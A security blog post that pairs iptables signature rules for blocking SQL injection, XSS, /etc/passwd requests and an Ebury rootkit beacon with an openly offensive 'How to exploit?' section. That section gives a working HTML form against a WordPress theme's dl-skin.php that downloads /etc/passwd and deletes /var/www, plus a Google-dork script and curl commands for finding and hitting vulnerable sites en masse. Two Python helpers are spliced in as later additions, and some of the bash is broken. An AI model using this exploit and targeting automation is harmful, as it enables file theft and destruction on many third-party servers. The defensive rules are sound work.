Tag Archive: Arbitrary File Download

iptables is no ordinary firewall, provided it is used properly.

There are cases where security analysts have no option to work with a hardware firewall, or sometimes no access to the data centre at all, mainly on cPanel servers.

In that case the only option is a customised solution; one such solution is shown below.



With iptables string matching you can achieve the highest security possible, combined with log scanning in case anything bypasses the firewall.

This is essentially an IPS/IDS that depends on signature matching.

  1. Create a chain, say "w00t".
  2. After all the INPUT rules, jump to the w00t chain for additional checks.
  3. Then specify malicious signatures to detect different types of attacks.
  4. If a packet matches, first log it and then drop it.

Your iptables file should look something like this:

:INPUT ACCEPT [2404:336622]
:OUTPUT ACCEPT [2359:257349]
:LOGGING - [0:0]
:w00t - [0:0]

-A INPUT -i lo -j ACCEPT
-A INPUT -s x.x.x.x -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s x.x.x.x -p tcp -m tcp --dport 22 -j ACCEPT

-A INPUT -p tcp -j w00t

-A OUTPUT -p tcp -m tcp --dport 53 -m string --hex-string "|120b01000001|" --algo bm --to 65535 -j LOG --log-prefix "Ebury SSH Rootkit:" --log-level 7
-A OUTPUT -p tcp -m tcp --dport 53 -m string --hex-string "|120b01000001|" --algo bm --to 65535 -j DROP

-A w00t -p tcp -m string --string "w00tw00t.at.ISC.SANS" --algo bm --to 65535 -j LOG --log-prefix "w00tw00t detected:" --log-level 7
-A w00t -p tcp -m string --string "w00tw00t.at.ISC.SANS" --algo bm --to 65535 -j DROP

The rules above will first log a matching packet (in the w00t chain) and then drop it. A logged hit looks like this:


Apr 14 20:19:29 darkwizz kernel: w00tw00t detected:IN=eth0 OUT= MAC=00:30:48:8f:49:c9:01:24:00:08:00 SRC=x.x.x.x DST= LEN=86 TOS=0x00 PREC=0x00 TTL=115 ID=10415 DF PROTO=TCP SPT=59420 DPT=80 WINDOW=256 RES=0x00 ACK PSH FIN URGP=0
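An added example (not code from the original post) that parses kernel LOG lines in the format shown above and counts hits per log prefix and source address; the sample lines are constructed, with made-up addresses, and the fourth one is a non-iptables line to show it is skipped.

```python
import re
from collections import Counter

# Constructed sample syslog lines (addresses are documentation ranges, not real hosts).
SAMPLE_LOG = """\
Apr 14 20:19:29 darkwizz kernel: w00tw00t detected:IN=eth0 OUT= MAC=00:30:48:8f:49:c9:01:24:00:08:00 SRC=192.0.2.10 DST=198.51.100.5 LEN=86 TOS=0x00 PREC=0x00 TTL=115 ID=10415 DF PROTO=TCP SPT=59420 DPT=80 WINDOW=256 RES=0x00 ACK PSH FIN URGP=0
Apr 14 20:19:31 darkwizz kernel: w00tw00t detected:IN=eth0 OUT= MAC=00:30:48:8f:49:c9:01:24:00:08:00 SRC=192.0.2.10 DST=198.51.100.5 LEN=86 TOS=0x00 PREC=0x00 TTL=115 ID=10416 DF PROTO=TCP SPT=59420 DPT=80 WINDOW=256 RES=0x00 ACK PSH FIN URGP=0
Apr 14 20:20:02 darkwizz kernel: Ebury SSH Rootkit:IN= OUT=eth0 SRC=198.51.100.5 DST=203.0.113.7 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=4321 DF PROTO=TCP SPT=40000 DPT=53 WINDOW=29200 RES=0x00 ACK PSH URGP=0
Apr 14 20:20:05 darkwizz sshd[1234]: Accepted publickey for root from 192.0.2.10 port 50000 ssh2
"""

# Timestamp, host, "kernel:", then the --log-prefix text up to the first IN= field.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) kernel: (?P<prefix>.*?)IN=(?P<rest>.*)$"
)


def parse_iptables_log(line):
    """Return a dict of fields for one iptables LOG line, or None if it is not one."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    fields = {"ts": m.group("ts"), "host": m.group("host"),
              "prefix": m.group("prefix").strip(), "flags": []}
    for tok in ("IN=" + m.group("rest")).split():
        if "=" in tok:
            key, value = tok.split("=", 1)
            fields[key] = value            # value may be empty, e.g. OUT= on an INPUT hit
        else:
            fields["flags"].append(tok)    # bare tokens such as DF, ACK, PSH, FIN
    return fields


def summarize(text):
    """Count hits per (log prefix, source IP) so repeat offenders stand out."""
    hits = Counter()
    for line in text.splitlines():
        fields = parse_iptables_log(line)
        if fields:
            hits[(fields["prefix"], fields["SRC"])] += 1
    return hits


if __name__ == "__main__":
    for (prefix, src), count in summarize(SAMPLE_LOG).most_common():
        print(f"{count:4d}  {prefix:<24} {src}")
```

Point the script at /var/log/firewall.log (see the syslog.conf line further down) and feed the per-source counts to whatever blocks or alerts on repeat offenders.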

Test Scenarios:

1. Open a command line and type:

nc -l 5501

2. Open another session to that server:

telnet server-ip 5501

From the telnet command line, type "test".

3. In the first session, where you ran the nc command, you'll see "test" appear.

4. From the second terminal (step 2), type "w00tw00t".

5. The string won't appear in the first session, and subsequent packets will be dropped by that server.

6. Check the logs and you will see the entry.

Where is the iptables log written?

cat /etc/syslog.conf

kern.*                        /var/log/firewall.log

Back to our firewall rules:

there is outbound traffic from the server being dropped if it matches the hex string "120b01000001", which is a signature for the Ebury trojan.

You can easily convert any Snort rule into an iptables rule.

Some rules according to the type of attack:

1. SQL Injection Attacks:

The string "%27or%271%27%3D%271" is URL-encoded; when the URL is decoded it reads ' or '1'='1.

-m string --string "%27+or+%271%27%3d%271"


2. Buffer Overflow Exploits


Recently I posted http://ustechnica.com/category/security/wordpress-arbitrary-file-download-and-file-deletion-exploit/

and was able to download the /etc/passwd file; you can match this string as well and drop the request.

3. Arbitrary File Download

-m string --string "/etc/passwd"

4. Cross Site Scripting

-m string --string "%3C%73%63%72%69%70%74%3E"

-m string --string "<script>"

You just need to convert the Snort rules to iptables; below is a good reference that can be used.
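An added example (not from the original post) of the Snort-to-iptables conversion described above: it takes a single-line Snort rule, turns each content: option into an xt_string match (plain text via --string, |..| hex sections via --hex-string, nocase via --icase), picks the port from the rule header, and emits the LOG + DROP pair used in this post. The chain name, log level and --to 65535 follow the rules shown above; the Snort rules in the test are constructed.

```python
import re

# Header: action proto src sport -> dst dport (options)
HEADER_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+->\s+"
    r"(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$"
)
# One option: keyword, optional ":value" (quoted values may contain escaped chars), then ";"
OPT_RE = re.compile(r'(\w+)(?::\s*("(?:[^"\\]|\\.)*"|[^;]*))?;')


def snort_to_iptables(rule, chain="w00t"):
    """Convert one single-line Snort rule into an iptables LOG rule and DROP rule."""
    m = HEADER_RE.match(rule.strip())
    if not m:
        raise ValueError("unrecognised rule header (only 'src sport -> dst dport' is handled)")
    opts = [(k, (v or "").strip()) for k, v in OPT_RE.findall(m.group("opts"))]
    msg = next((v.strip('"') for k, v in opts if k == "msg"), "snort match:")
    contents = [v.strip('"') for k, v in opts if k == "content"]
    if not contents:
        raise ValueError("only content-based rules can become string matches")
    nocase = any(k == "nocase" for k, _ in opts)

    match = ""
    for c in contents:
        # Snort escapes ';' as '\;'; '\"' and '\\' mean the same inside a shell double-quoted
        # string, so they are passed through untouched. '|..|' sections are hex bytes, which
        # xt_string understands via --hex-string.
        c = c.replace("\\;", ";")
        flag = "--hex-string" if "|" in c else "--string"
        match += f' -m string {flag} "{c}" --algo bm --to 65535'
        if nocase:
            match += " --icase"

    base = f"-A {chain} -p {m.group('proto')}"
    if m.group("dport") != "any":
        base += f" -m {m.group('proto')} --dport {m.group('dport')}"
    return [f'{base}{match} -j LOG --log-prefix "{msg}" --log-level 7',
            f"{base}{match} -j DROP"]
```

xt_string inspects one packet at a time, so a signature split across two TCP segments is not seen; Snort's stream reassembly has no iptables equivalent, which is why the log-scanning step above still matters.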


I don't know why developers around the globe are so much into copying and pasting before actually checking things out manually.

This is just a standard example of where security admins and system admins get screwed big time.

Tip for Security Admins:

  • Have proper input checks and URL sanitisation; for any request for OS files, or files that could bring your server down, block that IP.
  • Analyse logs, and have an automated script to parse them for malicious requests and IPs.
  • Keep yourself updated with the latest hacks and vulnerabilities.
  • Have an IDS for any newly installed application, and check for vulnerabilities associated with it.

Enough of consultancy!!!

How to exploit?

1. Google Dork,


2. A test domain hosted on a server; mine was testing.com (NOT LIVE), behind Tor 😉

Add the exploit below under public_html, say as test.html:

<form action="http://vulnerable-site.com/wp-content/themes/persuasion/lib/scripts/dl-skin.php" method="post">
Existing file's name:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
Directory to be removed:<input type="text" name="_mysite_delete_skin_zip" value="/var/www"><font color=red>Use with caution: it will delete the files and directories if it is writeable</font><br>
<input type="submit" name=press value="OK">
</form>



3. You'll find /etc/passwd downloaded; check /home/ and just delete it by specifying the path in the text box above.

4. Imagine it's coded and automated.

You can have something like the following: create a function, say google, and search as shown below.


function google { Q="$@"; GOOG_URL='https://www.google.de/search?tbs=li:1&q='; AGENT="Mozilla/4.0"; stream=$(curl -A "$AGENT" -skLm 10 "${GOOG_URL}${Q//\ /+}" | grep -oP '\/url\?q=.+?&amp' | sed 's|/url?q=||; s|&amp||'); echo -e "${stream//\%/\x}"; }

Sample Output:

[root@BT]# google inurl:wp-content/themes/persuasion/lib/scripts/ | sed 's/scripts.*$/scripts/' | uniq

Then you can use curl to check the HTTP status code of the above results:

URL=`google inurl:wp-content/themes/persuasion/lib/scripts/ | sed 's/scripts.*$/scripts/'`

for STATUS in $URL
HTTP_STATUS_CODE=`curl -s -o /dev/null -I -w "%{http_code}" http://www.bydelight.com/wp-content/themes/persuasion/lib/scripts/dl-skin.php`

if [ "$HTTP_STATUS_CODE" == 200 ];


curl command to post data


echo "message"



curl used together with formfind can handle web forms, or use the command below:

[root@BT]# curl --data "_mysite_download_skin=%2Fetc%2Fpasswd&_mysite_delete_skin_zip=%2Fvar%2Fwww&press=%20OK%20" --dump-header headers http://www.testing.com/test.html

If you are unfamiliar with curl, you can use FireCurl to get the response of the curl command.

In no time, you’ll end up bringing down 2k+ websites.

Vulnerable Script: